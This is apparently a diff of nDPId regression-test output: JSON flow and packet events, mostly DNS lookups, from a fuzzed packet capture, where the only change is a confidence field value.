00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1120470250906,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470250906,"pkt":"ADBUADRWAODtAW69CABFAABIas4AAIARTIPAqAGswKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1120470251907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470251907,"pkt":"ADBUADRWAODtAW69CABFAABIassAAIARTILAqAECwKgBAQrOADUANK35e\/0BAAABAAAAJXMABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1120470253909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470253909,"pkt":"ADBUADRWAODtAW69CABFAABIatAAAIARTIHAqAECwKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZTBjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470255912} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470253909,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1120470259918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470259918,"pkt":"ADBUADRWAODtAW69CABFAABIatkAAIQRTHjAqAECwKgBATnOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhABE="} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1120470267920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470267920,"pkt":"ADBUADRWAODtAW69CABFAABEatoAAIARTHvAqAECwKgBAQrPADUAMGzyt\/0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1120470267922,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470267922,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cs8AR09ueP2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAAC1Bsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470267922,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470267922,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1120470267925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470267925,"pkt":"ADBUADRWAODtAW69CABFAABIatwAAIARTHXAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470268921} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470268180,"pkt":"ADBUADRWAODtAW69CABFAGhIat4AAIARTHPAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1120470270925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470270925,"pkt":"ADBUADRWAODtAW69CABFAABIat8AAIARTHLAqAECwKgBAYrQADUANDb28v4BAAABwwAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470272927,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1120470272927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470272927,"pkt":"ADBUADRWAODtAW69CABFAABIauAAAIARTHFeqAECwKgBAQrQAAQANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1120470276933,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470276933,"pkt":"ADBUADRWAODtAW69CABFAABIauEAAIARTHDAqAECwKgBAQrQADUANDb28v4BALIBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
